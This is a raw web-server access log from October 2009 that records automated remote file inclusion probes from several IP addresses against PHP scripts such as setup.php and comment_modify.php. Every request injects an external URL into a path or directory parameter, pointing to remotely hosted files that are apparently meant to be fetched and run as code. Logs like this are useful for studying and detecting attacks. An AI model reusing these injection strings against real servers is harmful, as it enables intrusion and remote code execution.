94.102.6.154 - - [22/Oct/2009:01:45:35 -0400] "GET //?path%5Bdocroot%5D=http://beauty2009.poya.com.tw/upimgs/idxx.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
94.102.6.154 - - [22/Oct/2009:01:45:35 -0400] "GET /logs//?path%5Bdocroot%5D=http://beauty2009.poya.com.tw/upimgs/idxx.txt??? HTTP/1.1" 200 22863 "-" "Mozilla/5.0"
62.140.23.192 - - [22/Oct/2009:01:46:42 -0400] "GET /logs/error_log.Q109091200//setup.php?dir=http://fmmkor.org/zboard/data/mission/2.swf? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
62.140.23.192 - - [22/Oct/2009:01:46:43 -0400] "GET /logs//setup.php?dir=http://fmmkor.org/zboard/data/mission/2.swf? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
62.140.23.192 - - [22/Oct/2009:01:46:46 -0400] "GET //setup.php?dir=http://fmmkor.org/zboard/data/mission/2.swf? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
62.140.23.192 - - [22/Oct/2009:01:47:22 -0400] "GET //skin/ggambo7002_board/comment_modify.php?dir=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
62.140.23.192 - - [22/Oct/2009:01:47:22 -0400] "GET /logs//skin/ggambo7002_board/comment_modify.php?dir=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
62.140.23.192 - - [22/Oct/2009:01:47:24 -0400] "GET /logs/access_log.Q109072500//skin/ggambo7002_board/comment_modify.php?dir=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
62.140.23.192 - - [22/Oct/2009:01:47:37 -0400] "GET /logs/access_log.Q109072200//skin/ggambo7002_board/comment_modify.php?dir=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
98.129.217.53 - - [22/Oct/2009:01:48:22 -0400] "GET /newsletter_jobs_subnav.php?cfg[path][contenido]=http://sori.ca/bbs/skin/emovie/Fx29ID1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
98.129.217.53 - - [22/Oct/2009:01:48:22 -0400] "GET /logs/newsletter_jobs_subnav.php?cfg[path][contenido]=http://sori.ca/bbs/skin/emovie/Fx29ID1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
98.129.217.53 - - [22/Oct/2009:01:48:22 -0400] "GET /logs/access_log.Q109051700/newsletter_jobs_subnav.php?cfg[path][contenido]=http://sori.ca/bbs/skin/emovie/Fx29ID1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
216.108.229.70 - - [22/Oct/2009:01:48:28 -0400] "GET /logs//skin/ggambo4100_gallery2/setup.php?dir=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
216.108.229.70 - - [22/Oct/2009:01:48:28 -0400] "GET /logs/access_log.Q109091500%20%20//skin/ggambo4100_gallery2/setup.php?dir=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
216.108.229.70 - - [22/Oct/2009:01:48:28 -0400] "GET //skin/ggambo4100_gallery2/setup.php?dir=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
216.108.229.70 - - [22/Oct/2009:01:48:28 -0400] "GET /logs/error_log.Q109091500%20%20//skin/ggambo4100_gallery2/setup.php?dir=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
98.129.217.53 - - [22/Oct/2009:01:48:31 -0400] "GET /logs/access_log.Q109082500/newsletter_jobs_subnav.php?cfg[path][contenido]=http://sori.ca/bbs/skin/emovie/Fx29ID1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
216.108.229.70 - - [22/Oct/2009:01:48:31 -0400] "GET /logs//skin/ggambo4100_gallery2/setup.php?dir=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
216.108.229.70 - - [22/Oct/2009:01:48:31 -0400] "GET //skin/ggambo4100_gallery2/setup.php?dir=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
216.108.229.70 - - [22/Oct/2009:01:48:31 -0400] "GET /logs/error_log.Q109091500%20%20//skin/ggambo4100_gallery2/setup.php?dir=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
216.108.229.70 - - [22/Oct/2009:01:48:31 -0400] "GET /logs/access_log.Q109091500%20%20//skin/ggambo4100_gallery2/setup.php?dir=http://ssdnb.net//bbs//zfxid1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
